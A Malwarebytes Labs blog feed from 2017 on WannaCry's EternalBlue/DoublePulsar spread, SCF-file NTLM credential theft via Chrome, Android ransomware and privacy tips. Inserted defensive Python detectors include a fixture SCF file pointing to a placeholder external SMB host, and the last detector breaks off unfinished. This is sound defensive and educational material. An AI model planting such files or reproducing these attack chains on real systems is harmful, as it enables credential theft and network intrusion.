Techie Feeds

5 Unsettling cyberthreats

Malwarebytes - 2 hours 48 min ago

Cyberthreats are typically boring, repetitive, and require a reasonably predictable remediation process. A SQL injection is a SQL injection, no matter who’s trying it.  But what about the outliers? What about threats that impact you, but you can’t remediate, or establish a policy to cover?

Here are 5 cyberthreats that should frighten you, if they don’t already.

  1. VNC roulette. This was a website that scanned for computers that allowed remote sessions but were not secured by passwords or encryption. A fair number of the screenshots the site collected were from average users who simply failed to set up proper security settings. But there were also machines for which that failure was much more serious, like SCADA systems, CCTVs, and water treatment plants.

  2. A public drone feed? Last week a security blogger discovered what appeared to be a publicly accessible Predator drone feed. As it turned out, the video was actually an unclassified demo page created by a defense contractor using a misconfigured web server. While not exactly the OPSEC blunder viewers thought, the amount of critical infrastructure exposed to the internet and managed via unaccountable third parties is food for thought.

  3. Mirai botnet. Used in some of the largest DDoS attacks ever, including one to silence Brian Krebs, Mirai scans the internet for Internet of Things devices using factory default credentials and infects them. What’s the scope of a Mirai attack? Ars Technica reported a Mirai DDoS on French web host OVH of 1.7 terabytes. That’s not the scary part. The scary part is that the IoT market is booming, and its vendors have one of the most abysmal records of security engineering and poor judgment ever seen. And as of 2016, the most conservative estimate of IoT devices on the market was 6.4 billion.

  4. RATs. Some of us are familiar with remote access tools used to spy on the unwitting and sometimes take compromising pictures. But what happens when a RAT is embedded in a SaaS tool? Tech support scammers have been hit by third-party business services that sold their service with DarkComet bundled in. Given how tough it can be to vet a SaaS offering, the potential to impact legitimate businesses is very large.

  5. The Computer Fraud and Abuse Act. Nobody likes fraud and abuse, so what’s the big deal about an act designed to keep them off of computers? Well, the act was written in 1986, prompted by a White House screening of the movie WarGames (no, really), and criminalized those

“having knowingly accessed a computer without authorization or exceeding authorized access”

The phrase “exceeding authorized access” has proved problematic in recent years, as the automated scraping of content, saving public data that the owner didn’t intend to make public, and landing on unexpected pages due to a website’s misconfiguration have all been interpreted as violations of the law at one point or another. This is absolutely scary, as the act and its capricious enforcement have led to a chilling effect on vulnerability disclosure and introduced a risk to researchers who might otherwise work with law enforcement.

These are all scary cyberthreats not because of their technical sophistication, but more because they are failures of organizations and institutions that manage technology. Your security team can patch a zero-day vulnerability, but not the executive that insists his password be set to ‘1234’ for ‘convenience.’ When you have strong organizations, the cyberthreats you face suddenly get much less scary.

The post 5 Unsettling cyberthreats appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stealing Windows credentials using Google Chrome

Malwarebytes - Tue, 05/23/2017 - 14:00

Security researcher Bosko Stankovic recently published an article explaining how an attacker could use Chrome, the SMB file sharing protocol, and Windows Explorer Shell Command Files to steal victims’ credentials.

The basic elements

Chrome

Similar attacks have been demonstrated using Internet Explorer and Edge, but being able to do this with a (very popular) third-party browser greatly increases the chances of it being used in the wild. Chrome uses a technique called MIME-sniffing to decide how to handle text or text-like content, and it downloads files in which it finds a non-printable character. It saves these files to the default download folder specified in the Advanced Settings section of the Chrome Settings.

SMB protocol

This file sharing protocol recently gained a lot of fame by being exploited to spread the WanaCrypt ransomware worm. SMB is what Windows uses to share files, printers, and serial ports and to communicate this information between computers. By design, clients make SMB requests and servers make the resources available after successful authentication. But as it turns out, this feature can be (ab)used for a lot more.

SCF files

Windows Explorer Shell Command Files are basically shortcuts with a run command. A very noteworthy feature is that the .scf extension stays invisible even if you have set Explorer to show extensions.

So you will have to take a really close look at a file with a double extension like example.txt.scf to see the difference from an actual .txt file.


Another thing that makes SCF files dangerous is that they are triggered as soon as the folder they are in is opened. Windows sends a request for the resource the very moment the file is shown in Windows Explorer.

The possible attack

The attacker plants an SCF file containing a non-printable character on a website that he knows his victim(s) frequent (a watering hole attack). Or, if the threat actor is after a bigger audience, he can rig a malvertising campaign or use social media.

Chrome users will get the SCF file downloaded to their default downloads folder, and the next time they want to look at or move a file in that folder, the SCF file will be triggered as soon as the downloads folder is opened in Windows Explorer.

As explained, SCF files can be configured to contact a server with a request for a resource (i.e. a file). There are no restrictions, so this can be a remote server under the attacker’s control. In order to make the resource request, Windows needs to send an authentication request via SMB, which can be captured on the server. The request includes the victim’s username, domain, and NTLMv2 password hash. This information can be extremely useful for an attacker who wants to expand his foothold on a network.

The consequences

Once the attacker has the hashed password, how long it takes to recover the password depends on the strength of the password behind the hash. This can vary from mere seconds to a few days. In targeted attacks, you can be sure the username and hash will be checked against lists published after breaches to see whether a password has been re-used and can be matched with the hash even faster.

If the Windows 8/10 user is using Microsoft Authentication (MSA) to use Microsoft services like Office 365, OneDrive, Skype, and many others, the impact on the victims can be even bigger.


You have probably heard this before this week, but if you don’t need SMB, disable it. This is the only part of the attack chain the end user can easily change, by executing a simple PowerShell command. Other options are:

  • Always use the “Save as…” option when you are knowingly downloading something, so you never have to open the default downloads folder.
  • Alter the file association for SCF files, which you would have to do in the registry. Changing the default value under the key HKEY_CLASSES_ROOT\.scf to “txtfile” makes the extension visible and opens the files in Notepad.

But disabling SMB is more likely to be successful and it helps protect you against other malware like the WannaCry ransom worm and the Adylkuzz cryptocurrency miner.
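A defender-side check for the downloads-folder scenario described above, written as an added example (it is not code from the Malwarebytes post or from Stankovic’s research): it lists every .scf file in a folder, records the name Explorer would show once the hidden .scf suffix is dropped, and flags any UNC path (\\host\share) inside the file, since that is what makes Explorer reach out over SMB. The folder and its three files are constructed for the example; the 203.0.113.10 address is a TEST-NET placeholder, and the file contents follow the documented SCF layout rather than any real sample.

```python
import re
import tempfile
from pathlib import Path

# A UNC reference such as \\203.0.113.10\share inside the file is what makes Explorer
# open an SMB connection (and offer NTLM authentication) as soon as the folder is shown.
UNC_RE = re.compile(r"\\\\([^\\\s]+)\\")


def scan_downloads(folder):
    """Return one finding per .scf file in folder, flagging remote (UNC) references.

    Explorer hides the .scf suffix even when extensions are shown, so each finding
    also records the name the user would actually see in the folder listing.
    """
    findings = []
    for path in sorted(Path(folder).iterdir()):
        if not path.is_file() or path.suffix.lower() != ".scf":
            continue
        text = path.read_text(errors="replace")
        hosts = sorted(set(UNC_RE.findall(text)))
        findings.append({
            "file": path.name,
            "displayed_as": path.name[:-len(path.suffix)],
            "remote_hosts": hosts,
            # any .scf in Downloads is suspicious; one pointing at a remote host is the attack
            "risk": "high" if hosts else "medium",
        })
    return findings


def build_sample_folder():
    """Create a constructed Downloads folder with sample files (not real malware)."""
    folder = Path(tempfile.mkdtemp(prefix="downloads_"))
    # constructed: a double-extension SCF referencing an external (TEST-NET) host
    (folder / "example.txt.scf").write_text(
        "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.10\\share\\icon.ico\r\n")
    # constructed: an SCF that only references a local icon, so no SMB request leaves the box
    (folder / "local.scf").write_text(
        "[Shell]\r\nCommand=2\r\nIconFile=C:\\Windows\\System32\\shell32.dll,3\r\n")
    # constructed: an ordinary text file that must not be reported
    (folder / "notes.txt").write_text("just notes\r\n")
    return folder


if __name__ == "__main__":
    for finding in scan_downloads(build_sample_folder()):
        print(finding)
```

Run it against a real Downloads directory by passing that path to scan_downloads; a "high" finding is a file that would have authenticated to a remote host the moment the folder was opened, and a "medium" finding is still worth deleting, because a legitimate download is rarely an .scf.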


This article explains how Chrome users are at risk of spilling their Microsoft Authentication credentials by simply visiting the wrong site.


Pieter Arntz


Mobile Menace Monday: Ransomware targets Tencent users

Malwarebytes - Mon, 05/22/2017 - 14:00

Early this April, an increase in infection rates of a ransomware variant known as Android/Ransom.SLocker.fh was seen.

Ransomware targets Tencent users

An especially relevant trait of SLocker.fh is its use of Tenpay to send payment to the criminals. Tenpay is an integrated payment platform by Tencent, China’s largest Internet service portal. Thus, it is no surprise that SLocker.fh originates from China.

In order to pay, users must have a QQ ID to send payment, which is provided. Since Tencent’s most popular platform is QQ Instant Messenger, the criminals are probably targeting these users the most.

Various iterations to fool users

Like many Android ransomware apps, SLocker.fh masquerades as various legitimate apps to fool users into granting it escalated rights. Users who accept the escalated rights will have their device forcibly rebooted. After the reboot, the device is locked with an overlay screen containing instructions to pay.

Stay protected

Because Android ransomware is on the rise, users should be extra cautious. You can protect yourself by being careful about giving superuser and/or device administrator rights to any app that asks for them. If the app looks shady, like the two examples above, this is especially true.

So you’re infected with ransomware

A good anti-malware scanner like Malwarebytes Anti-Malware Mobile can remove the ransomware, but only BEFORE escalated rights are granted. Afterward, it becomes a bit harder. For how to remove such infections, refer to the blog post “Difficulty removing Koler Trojan or other ransomware on Android?”.

As always, stay safe out there.


A week in security (May 15 – May 21)

Malwarebytes - Mon, 05/22/2017 - 13:59

Last week was dominated by the WannaCry ransomware and the discussions that ensued. We published:

Others discussed:

In other news we celebrated Privacy Awareness Week, highlighting the two main themes:

  1. Share with care.
  2. Trust and transparency.

And we gave out some pointers on what to consider and how to act when you have reason to believe that your personal information was stolen.

Other important security news:

  • Researchers from Carnegie Mellon University, Seagate, and the Swiss Federal Institute of Zurich published a paper entitled “Vulnerabilities in MLC NAND Flash Memory Programming: Experimental Analysis, Exploits, and Mitigation Techniques.” Our friends at Bleeping Computer explained the vulnerability found in SSD drives.
  • A Croatian security investigator has discovered a new network worm that uses 7 tools and exploits from the US intelligence service NSA. The worm is called EternalRocks, but its original name is “MicroBotMassiveNet”.
  • Wikileaks has released information about other CIA tools called Athena and Hera, spyware designed to take full remote control over infected Windows PCs.

In non-security news, we were amazed by this jewel telling us that scientists at UCLA and the University of Connecticut managed to create a protein-based battery-like device that extracts energy from the human body which could potentially be used to power implants like pacemakers.

Safe surfing, everyone!

The Malwarebytes Labs Team


WannaDecrypt your files? The WannaCry solution, for some

Malwarebytes - Fri, 05/19/2017 - 20:11

We just wanted to shoot out a quick blog post to let you know about a decryptor (Wanakiwi) that has been developed for WannaCry/WannaCrypt/wCrypt. There is a catch, though: it only works for the following operating systems:

  • Windows XP
  • Windows Server 2003
  • Windows Vista
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows 7

So if you’ve got a WannaCry infection on one of the above operating systems, there is hope!


The decryptor is only going to work if you haven’t restarted the infected system and you haven’t killed the ransomware process (should be wnry.exe or wcry.exe) so please don’t restart or kill the process if you want to get those files back!


In order to use this tool, you first need to download it from here.

This tool essentially searches the system’s memory for the prime numbers behind the encryption key and pieces the key back together. However, it relies on what is currently in running memory, so once you reboot the key will be gone, and if you’ve done too much on the system since infection, it’s possible the key won’t be found (because it has been overwritten by data from other applications using the same memory space).

To run it, download the linked file (above) and extract the .zip to a folder on your desktop (if you can download the file from a clean system and then transfer it via USB, you run less risk of overwriting the key in memory).

Next, you can either double click it (boring) or open the command prompt (Start + CMD) and run it through there (fun!).

The tool will automatically identify the WannaCrypt processes running on the system if they are called wnry.exe or wcry.exe, but if for some reason it can’t find them, check the running applications on your system (Task Manager/Process Explorer), find the offender (it’s pretty obvious), identify its process identifier (PID), and pass that on the command line after wanakiwi.exe.

It might take a few minutes for the tool to find the key (or many minutes in some cases), but once it’s found the tool is going to start searching your system for encrypted files and decrypt them automatically.


After the tool finishes decrypting your files, you are going to be left with a ransom note as a background and lots of encrypted files next to your unencrypted files.

Here are some possible next steps:

  • Download Malwarebytes 3.0 (or whatever scanning tool you prefer that can clean up WannaCry) and run a scan on the system to identify all artifacts related to WannaCry. This will help you get the malware off the system in case it tries to encrypt again.
  • Restart the computer to finish clean-up.
  • Find all the most important files you want to keep and move them to some form of backup.
  • Wipe the system and reinstall Windows.
  • OR you can just go through your system looking for all files with the .WNCRY extension and getting rid of them.

The original memory scrubbing, prime number searching WannaKey decryptor tool (for XP) was written by Adrien Guinet (@adriengnt) and then used as the base for Wanakiwi developed by Benjamin Delpy (@gentilkiwi). These guys are incredibly talented and deserve a round of applause!

We found out about the tool thanks to the very extensive blog post by Matt Suiche (@msuiche), which you should check out to get more information about how these tools work. You might remember Matt from his assistance in stopping a variant of the WannaCry released last week by registering the killswitch domain.


We didn’t want to write about this tool until we tested it in some capacity. A lot of other security researchers have given it a go and it seems that the tool works well in lab environments (sometimes). I personally tested it on a Windows 7 system using the following sample (with mixed results):


  • My first test worked like a charm.
  • My second test with a new profile (for taking screenshots for this post) couldn’t actually launch the malware.
  • My third test launched the malware, but the decryptor took forever and eventually never found the key.
  • My fourth test worked like a charm again (original profile).
  • Some of our other researchers tried it and were unable to get the tool to find the key.

This tool was put together very quickly and it’s meant to help those that it can help, and that is likely not everybody. I wouldn’t recommend putting all your eggs in one basket by assuming that if you get hit, you could decrypt using this tool, because either:

  • You are likely going to be unable to recover the key, OR
  • The malware will be modified to clean up the running memory or force a reboot after install, making the tool ineffective.

But if you are currently dealing with a WannaCry infection, you have barely touched the infected system(s), and you are running one of the operating systems listed at the beginning of this post, running the tool is not going to break anything that isn’t already broken so it’s worth a shot just to see if you can get those files back.

That being said, once again big thanks to @adriengnt, @gentilkiwi & @msuiche for their hard work, information spreading and ingenious development skills.

Let us know in the comments if this tool worked for you (and your configuration too!)


How did the WannaCry Ransomworm spread?

Malwarebytes - Fri, 05/19/2017 - 14:00

Security researchers have had a busy week since the WannaCry ransomware outbreak that wreaked havoc on computers worldwide. News of the infection and the subsequent viral images showing everything from large display terminals to kiosks being affected created pandemonium in ways that haven’t been seen since possibly the MyDoom worm circa 2004.

News organizations and other publications were inundating security companies for information to provide to the general public – and some were all too happy to oblige. Information quickly spread that a malicious spam campaign had been responsible for circulating the malware. This claim will usually be a safe bet, as ransomware is often spread via malicious spam campaigns. Admittedly, we also first thought the campaign may have been spread by spam and subsequently spent the entire weekend poring through emails within the Malwarebytes Email Telemetry system searching for the culprit. But like many others, our traps came up empty.

Claims of WannaCry being distributed via email may have been an easy mistake to make. Not only was the malware outbreak occurring on a Friday afternoon, but around the same time a new ransomware campaign was being heavily distributed via malicious email and the popular Necurs botnet. We recently wrote about the Jaff ransomware family and the spam campaign that was delivering it.

Some may have seen the rash of news occurring on their feeds, an uptick in ransomware-themed document malware in their honeypots, and then jumped to conclusions as a way to be first with the news.

But here at Malwarebytes we try not to do that. And now after a thorough review of the collected information, on behalf of the entire Malwarebytes Threat Intelligence team, we feel confident in saying those speculations were incorrect.

Indeed, the ‘ransomworm’ that took the world by storm was not distributed via an email malspam campaign. Rather, our research shows this nasty worm was spread via an operation that hunts down vulnerable public facing SMB ports and then uses the alleged NSA-leaked EternalBlue exploit to get on the network and then the (also NSA alleged) DoublePulsar exploit to establish persistence and allow for the installation of the WannaCry Ransomware.

We will present information to support this claim by analyzing the available packet captures, binary files, and content from within the information contained in the ShadowBrokers dump, and correlating what we know thus far regarding the malware infection vector.

Here’s what we know

EternalBlue

EternalBlue is an SMB exploit affecting various Windows operating systems from XP to Windows 7 and various flavors of Windows Server 2003 and 2008. The exploit technique is known as heap spraying and is used to inject shellcode into vulnerable systems, allowing the system to be exploited. The code is capable of targeting vulnerable machines by IP address and attempting exploitation via SMB port 445. The EternalBlue code is closely tied to the DoublePulsar backdoor and even checks for the existence of that malware during the installation routine.

EternalBlue checks for DoublePulsar

EternalBlue strings

Bits of information obtained by reviewing the EternalBlue-2.2.0.exe file help demonstrate the expected behavior of the software. The screenshot above shows that the malware:

  • Sends an SMB Echo request to the targeted machine
  • Sets up the exploit for the target architecture
  • Performs SMB fingerprinting
  • Attempts exploit
  • If successful exploitation occurs, WIN
  • Pings the backdoor to get an SMB reply
  • And if the backdoor is not installed, it’s game on!

The ability of this code to beacon out to other potential SMB targets allows for propagation of the malicious code to other vulnerable machines on connected networks. This is what made the WannaCry ransomware so dangerous. The ability to spread and self-propagate causes widespread infection without any user interaction.


DoublePulsar is the backdoor malware whose presence EternalBlue checks for; the two are closely tied together.

This particular malware uses an APC (Asynchronous Procedure Call) to inject a DLL into the user mode process of lsass.exe. Once injected, exploit shellcode is installed to help maintain persistence on the target machine. After verifying a successful installation, the backdoor code can be removed from the system.

DoublePulsar Parameters

The purpose of the DoublePulsar malware is to establish a connection allowing the attacker to exfiltrate information and/or install additional malware (such as WannaCry) on the system. These connections allow an attacker to establish a Ring 0 level connection via the SMB (TCP port 445) and/or RDP (TCP port 3389) protocols.

DoublePulsar Ring0 Connections

Network analysis

Taking a look at the wannacry.pcap file shared to VirusTotal by @benkow_ helps us attribute the previously discussed code as the infection vector via the initial calls of the attack cycle.

A high-level view of a compromised machine in Argentina that attacked the honeypot:

The widely publicized kill-switch domain is present in the pcap file. As was reported, the malware made a DNS request to this site. Until @MalwareTech inadvertently shut down the campaign by registering the domain, the malware would use this as a mechanism to determine if it should run.

DNS lookup to Sinkhole

The SMB traffic is also clearly visible in the capture. These SMB requests are checking for vulnerable machines using the exploit code above.

SMB Requests

The exploit sends an SMB ‘trans2 SESSION_SETUP’ request to the infected machine. According to SANS, this is short for Transaction 2 Subcommand Extension and is a function of the exploit. This request can determine if a system is already compromised and will issue different response codes to the attacker indicating ‘normal’ or ‘infected’ machines.

Diving into the .pcap a bit more, we can indeed see this SMB Trans2 command and the subsequent response code of 81 which indicates an infected system. If the attacker receives this code in response, then the SMB exploits can be used as a means to covertly exfiltrate data or install software such as WannaCry.
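The Trans2 response code the capture shows can be turned into a detection rule. The following is an added example and not code from the Malwarebytes post: it parses the NetBIOS session header and the 32-byte SMB1 header of a TCP/445 frame and reports a backdoor indicator when a Trans2 (command 0x32) reply carries Multiplex ID 81 (0x51), which is the value the post identifies as the infected response. The frames are constructed in the block (header only, no SMB body); a real pcap would carry full frames, so feed this function the bytes of each TCP payload.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
SMB_COM_NEGOTIATE = 0x72
SMB_FLAGS_REPLY = 0x80
# Multiplex ID the capture showed in the Trans2 reply from an already-backdoored host
DOUBLEPULSAR_INFECTED_MID = 81  # 0x51

# 32-byte SMB1 header, little-endian, no padding:
# magic, command, status, flags, flags2, pid_high, signature, reserved, tid, pid_low, uid, mid
_SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")


def parse_smb1(frame):
    """Parse the 4-byte NetBIOS session header plus the SMB1 header of one frame."""
    if len(frame) < 4 + _SMB1_HEADER.size:
        raise ValueError("frame too short for NetBIOS + SMB1 header")
    if frame[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    (magic, command, status, flags, flags2, pid_high, _signature,
     _reserved, tid, pid_low, uid, mid) = _SMB1_HEADER.unpack(frame[4:36])
    if magic != SMB1_MAGIC:
        raise ValueError("not an SMB1 frame")
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": (pid_high << 16) | pid_low, "uid": uid, "mid": mid,
            "is_reply": bool(flags & SMB_FLAGS_REPLY)}


def classify_trans2_response(frame):
    """Verdict for one frame: 'backdoor-indicator', 'trans2-response', or 'other'."""
    hdr = parse_smb1(frame)
    if hdr["command"] != SMB_COM_TRANSACTION2 or not hdr["is_reply"]:
        return "other"
    if hdr["mid"] == DOUBLEPULSAR_INFECTED_MID:
        return "backdoor-indicator"
    return "trans2-response"


def build_frame(command, flags, mid):
    """Constructed sample frame (header only, no body) used to exercise the parser."""
    hdr = _SMB1_HEADER.pack(SMB1_MAGIC, command, 0, flags, 0, 0, b"\x00" * 8, 0, 0, 0, 0, mid)
    # NetBIOS session message: type 0x00 followed by a 3-byte big-endian length
    return b"\x00" + len(hdr).to_bytes(3, "big") + hdr


def summarize(frames):
    """Count verdicts across a list of frames, as a detection rule would over a whole pcap."""
    counts = {"backdoor-indicator": 0, "trans2-response": 0, "other": 0}
    for frame in frames:
        counts[classify_trans2_response(frame)] += 1
    return counts


if __name__ == "__main__":
    sample = [
        build_frame(SMB_COM_TRANSACTION2, 0x00, 0x41),            # constructed: Trans2 request
        build_frame(SMB_COM_TRANSACTION2, SMB_FLAGS_REPLY, 81),   # constructed: reply, MID 81
        build_frame(SMB_COM_NEGOTIATE, SMB_FLAGS_REPLY, 0),       # constructed: Negotiate reply
    ]
    print(summarize(sample))
```

Only replies are classified, because the Multiplex ID in a request is chosen by the client and carries no information about the server; a single "backdoor-indicator" verdict from a host on your network is reason to isolate it and look for the lsass.exe injection the post describes.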

Trans2 Multiplex ID

Putting it all together

The information we have gathered by studying the DoublePulsar backdoor capabilities allows us to link this SMB exploit to the EternalBlue SMB exploit. It’s really not hard to do so as both were patched as part of the MS17-017 Security Bulletin prior to this event, and as previously mentioned, were both released in the well-publicized ShadowBrokers-NSA dumps.

Without otherwise definitive proof of the infection vector via user-provided captures or logs, and based on the user reports stating that machines were infected when employees arrived for work, we’re left to conclude that the attackers initiated an operation to hunt down vulnerable public-facing SMB ports and, once located, used the newly available SMB exploits to deploy malware and propagate to other vulnerable machines within connected networks.

Developing a well-crafted campaign to identify as few as a few thousand vulnerable machines would allow for the widespread distribution of this malware on the scale and at the speed that we saw with this particular ransomware variant.

So what did we learn?

Don’t jump to conclusions. Malware analysis is difficult and it can take some time to determine attribution to a specific group and/or to assess the functionality of a particular campaign – especially late on a Friday (which, BTW, can all you hackers quit making releases on Fridays!!). First comes stopping the attack; second comes analyzing it. Remember, patience is a virtue.

Update, update, UPDATE! Microsoft released patches for these exploits prior to their weaponization. Granted, patches weren’t available for all Operating Systems, but the patch was available for the vast majority of machines. This event even forced Microsoft to release a patch for the long-ago EOL Windows XP – which gets back to the first thing that was said. UPDATE! Why are there still machines on XP!? These machines are vulnerable (beyond this attack) to the ransomware functionality of this attack and they need to be updated.

Disable unnecessary protocols. SMB is used to transfer files between computers. The setting is enabled on many machines but is not needed by the majority. Disable SMB and other communications protocols if not in use.

Network Segmentation is also a valuable suggestion as such precautions can prevent such outbreaks from spreading to other systems and networks, thus reducing exposure of important systems.

And finally, don’t hoard exploits. Microsoft president Brad Smith used this event to call out the ‘nations of the world’ to not stockpile flaws in computer code that could be used to craft digital weapons.

That reminds me of an article I wrote a few years ago (and which was substantially cut for length) about Hacking Team and the government sanctioned use of exploits.

Hack Me: A Geopolitical Analysis of the Government Use of Surveillance Software

I guess things haven’t changed…


Information stolen? What now?

Malwarebytes - Thu, 05/18/2017 - 15:00

There are several different types of malware that look for interesting information on an infected computer and transmit that information to the threat actor.

Identifying and removing the malware is our job, but what do you need to do yourself to control the aftermath? To answer that question it’s important to know what information the malware was after and sometimes how long it has been active.


What types of information are the malware authors after? Most of the time they are after anything that they can turn into cash. In rare cases of targeted attacks, they could be after other confidential information. Consider for example a keylogger installed by a close relative who is curious about some aspects of your private life.

But usually we can divide the sought after information in these categories:

  • Banking details
  • Shopping website credentials
  • Other website credentials
  • Gaming credentials
  • Bitcoin and other eMoney wallets
  • Email credentials

Time period

When is the infection period important and why? It is important in cases of malware that tracks the user’s activities like keyloggers and malware that intercepts internet traffic. It should be clear that knowing when this tracking started can be very helpful in determining which important information could have been stolen.

Tip: do not rely on your memory too much. If you are unsure whether you have used a password recently, change it.

How do I recognize malware that has stolen information?

Sometimes you can tell by our naming convention that a particular malware was after your information. But not all of them are called Spyware.PasswordStealer. For starters look up information about the detection on your machine. Alarm bells should be ringing if the detections are spyware, keyloggers, and backdoors. Although, other Trojans are capable of stealing information as well.

In our threat library you can find information of this kind under the header Remediation, so look for your detection there if this applies to you.


In most cases, this is easy to guess. The stolen information could be used in ways that will cost you money. What could be the threat actor’s goals?

  • Withdrawing money from your accounts
  • Shopping at your expense
  • Impersonating you for other reasons
  • Extortion with personal information (doxing, sextortion, etc.)

What can you do to limit the dangers as much as possible?

  • Change the passwords that might have been stolen for every website you can remember logging into.
  • If your email account has been compromised, change that password first as other credentials may be sent to you by mail and still end up in the wrong hands. Some webshops even send you a password in plain-text (shudders).
  • Keep a close eye on your banking and eMoney accounts. Use the activity alerts that some banks offer.
  • Keep tabs on your posts in social media. It may look silly to check what you have supposedly posted yourself, but imagine someone else doing it for you.

Extra precautions

Related article

Info stealers

Stay safe out there and get protected.


Pieter Arntz


Privacy Awareness Week: A primer

Malwarebytes - Wed, 05/17/2017 - 15:00

The Asia Pacific Privacy Authorities (APPA) began an initiative called Privacy Awareness Week, or PAW, with the purpose of educating users about current privacy issues and promoting the importance of keeping their personal information safe.

This has remained its core purpose for more than a decade now.

For those who may not be familiar with what this campaign is all about, this post aims to answer the questions you may have in mind about PAW.

When is Privacy Awareness Week?

APPA typically celebrates Privacy Awareness Week in May every year. Since the organization has a number of member countries, they each decide on when they want to hold the event locally.

In the first week of May, Singapore held its PAW locally. Hong Kong, New Zealand, and the United States held their own campaigns in the second week of May.

Australia is celebrating Privacy Awareness Week this week.

Are there other countries that will hold this event?

There are a total of 11 member countries comprising APPA. Aside from those already mentioned, Canada, Colombia, Korea, Macao, Mexico, and Peru are or will also be celebrating this campaign.

What’s the theme of this year’s Privacy Awareness Week?

There are two themes that APPA members are using: “Share with care” and “Trust and transparency”.

Share with care. This stresses the importance of caring for your privacy, given that our current technological landscape is heavily data-driven. It also reminds users to think about what may or may not happen to their personal information once it has been shared.

Trust and transparency. Both trust and transparency are vital to each other, as people normally expect one to exist with the other. Case in point: it is important for businesses to gain the trust of their clients, and it’s important for clients to know that the businesses they trust are clear about what they do with, how they store, and how they use what clients give them, which in this case is their personal information.

Can we celebrate Privacy Awareness Week even if our country is not a member of APPA?

Privacy Awareness Week is about educating users concerning privacy. There are ways individuals and organizations can celebrate PAW. One example is to use social media to raise awareness among your followers. Another is to do a refresher of your organization’s privacy policy. If it doesn’t have one, why not encourage your organization to make one?

Privacy and security go hand in hand. Practicing solid cybersecurity hygiene coupled with a fair familiarity of how personal data changes hands can bring about positive experiences to our digital lives. As such, we encourage you, dear Reader, to check out some of our previous posts and reacquaint yourselves on how you can keep your data safe and your computing devices secure:

Happy Privacy Awareness Week, everyone, wherever you are, and remember to share your personal info with care!


The Malwarebytes Labs Team

The post Privacy Awareness Week: A primer appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Wanna Cry some more? Ransomware roundup special edition

Malwarebytes - Mon, 05/15/2017 - 21:25

Whether you call it WannaCry, WannaCrypt, WCrypt, Wanacrypt0r, WCry, or one of the other names currently vying for the “call me this” crown, the ubiquitous ransomware which brought portions of the UK’s NHS to its knees over the weekend, along with everything from train stations to ATMs, is still with us and causing mayhem worldwide. As a result, our regular roundup has been replaced with what will hopefully serve as a useful place to collect links related to the attack.

First things first: this was a big enough incident that Microsoft created a special patch for Windows XP users, some three years after support for it was ended. Regardless of your Windows version, go get your update.

Now that we have that out of the way, here are some handy links for getting a good overview of what’s been going on:

This is a rapidly changing story, with a lot of valuable follow-up data being posted to haunts favored by security researchers such as Twitter, and we’ll likely add more links as the days pass. Update your security tools, patch your version of Windows and stay safe!


The Malwarebytes Labs Team

The post Wanna Cry some more? Ransomware roundup special edition appeared first on Malwarebytes Labs.


The worm that spreads WanaCrypt0r

Malwarebytes - Fri, 05/12/2017 - 22:02

Something that many security researchers have feared has indeed come true. Threat actors have integrated a critical exploit taking advantage of a popular communication protocol used by Windows systems, crippling thousands of computers worldwide with ransomware.

Within hours of being leveraged, a flaw that had been recently patched by Microsoft has been used to distribute the WanaCrypt0r ransomware and wreak havoc worldwide.

In this blog post, we will describe the worm responsible for spreading this ransomware by looking at its capabilities and what has made this threat so successful.

Main functionality

WanaCrypt0r has been most effective—not only does the ransomware loop through every open RDP session on a system and run the ransomware as that user, but the initial component that gets dropped on systems appears to be a worm that contains and runs the ransomware, spreading itself using the ETERNALBLUE SMB vulnerability (MS17-010).

The WinMain of this executable first tries to connect to the website It doesn’t actually download anything there, just tries to connect. If the connection succeeds, the binary exits.

This was probably some kind of kill switch or anti-sandbox technique. Whichever it is, it has backfired on the authors of the worm, as the domain has been sinkholed and the host in question now resolves to an IP address that hosts a website. Therefore, nothing will happen on any new systems that run the executable. This only applies to the binary with the hash listed above; there may well be new versions released in the future.

After this check passes, the first thing the worm does is check the number of arguments it was launched with. If it was run with fewer than two arguments, it installs a service called mssecsvc2.0 with display name Microsoft Security Center (2.0) Service (the service binary is the worm itself, launched with two arguments), starts that service, drops the ransomware binary stored in the worm’s resources, and runs it.

If it was run with two arguments or more—in other words, if it was run as a service—execution eventually falls through to the worm function.

The initialization function, which is called first, calls WSAStartup() to initialize networking, then CryptAcquireContext() to initialize the crypto API so it can use a cryptographically secure pseudo-random number generator. It then calls a function that initializes two buffers used for storing the worm payload DLLs, one x86 and one x64. It copies the payload DLLs from the .data section of the worm and then copies the entire worm binary after it.

The code of each payload DLL is very small: it just gets the resource content (i.e. the worm binary), drops it to disk as C:\WINDOWS\mssecsvc.exe (this path is hardcoded) and executes it.

SMB vulnerability leveraged to spread ransomware worldwide

After initializing the functionality used by the worm, two threads are created. The first thread scans hosts on the LAN. The second thread gets created 128 times and scans hosts on the wider Internet.

The first thread (in charge of scanning LAN) uses GetAdaptersInfo() to get a list of IP ranges on the local network, then creates an array of every IP in those ranges to scan.

The LAN scanning is multithreaded itself, and there is code to prevent scanning more than 10 IP addresses on the LAN at a time.

The scanning thread tries to connect to port 445 and, if the connection succeeds, creates a new thread to try to exploit the system using MS17-010/EternalBlue. If the exploitation attempts take over 10 minutes, the exploitation thread is stopped.

The threads that scan the Internet generate a random IP address, using either the OS’s cryptographically secure pseudo-random number generator initialized earlier, or a weaker pseudo-random number generator if the CSPRNG failed to initialize. If a connection to port 445 on that random IP address succeeds, the entire /24 range is scanned, and exploit attempts are made against every host in it with port 445 open. This time, the exploitation timeout for each IP is one hour rather than 10 minutes.

The exploitation thread tries several times to exploit, with two different sets of buffers used (perhaps one for x86 and one for x64). If it detects the presence of DOUBLEPULSAR after any exploitation attempt, it uses DOUBLEPULSAR to load the relevant payload DLL.
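A defender-side check for the fan-out pattern described above, added here as an example and not code from the Malwarebytes analysis: it reads constructed connection records and flags any source that reaches more LAN hosts on TCP/445 than the worm’s own 10-target cap, or that touches most of a public /24 on 445 (the sweep that follows a successful random hit). The record format, the RFC 1918 LAN definition and both thresholds are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed connection records (src, dst, dport); not taken from the original post.
# 10.0.0.5 touches 29 LAN hosts and a full public /24 on 445, the worm's pattern.
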